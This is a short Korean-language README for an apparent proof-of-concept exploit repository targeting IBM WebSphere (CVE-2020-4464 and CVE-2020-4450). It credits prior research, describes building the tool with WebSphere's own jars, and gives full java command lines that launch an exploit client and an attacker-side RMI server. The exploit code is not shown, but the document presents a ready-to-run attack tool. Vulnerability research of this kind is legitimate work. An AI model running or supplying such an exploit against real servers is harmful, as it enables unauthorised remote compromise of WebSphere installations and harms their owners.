
CVE-2020-4464 / CVE-2020-4450
이것은 ZDI의 훌륭한 블로그 게시물을 기반으로 합니다 (원본 보고서: @_tint0):
... 그리고 몇몇 훌륭한 중국 해커들의 작업 (코드의 실제 출처를 확인할 수 없었습니다. 크레딧을 받아야 한다고 생각되면 언제든지 Issue를 열어주세요):
내가 추가한 것 (사실 별로 없음):
FoxGlove의 코드는 서브모듈로 포함되어 있으며, WebSphere 요청 파일을 사용하여 CVE-2020-4464를 트리거할 수 있습니다.
WebSphere의 plugins 및 runtimes 디렉터리를 lib 디렉터리로 복사한 다음 ant를 실행하여 컴파일해야 합니다!
실행 방법 (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer